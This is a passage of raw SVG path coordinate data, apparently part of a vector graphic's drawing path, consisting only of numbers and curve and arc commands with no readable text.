5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.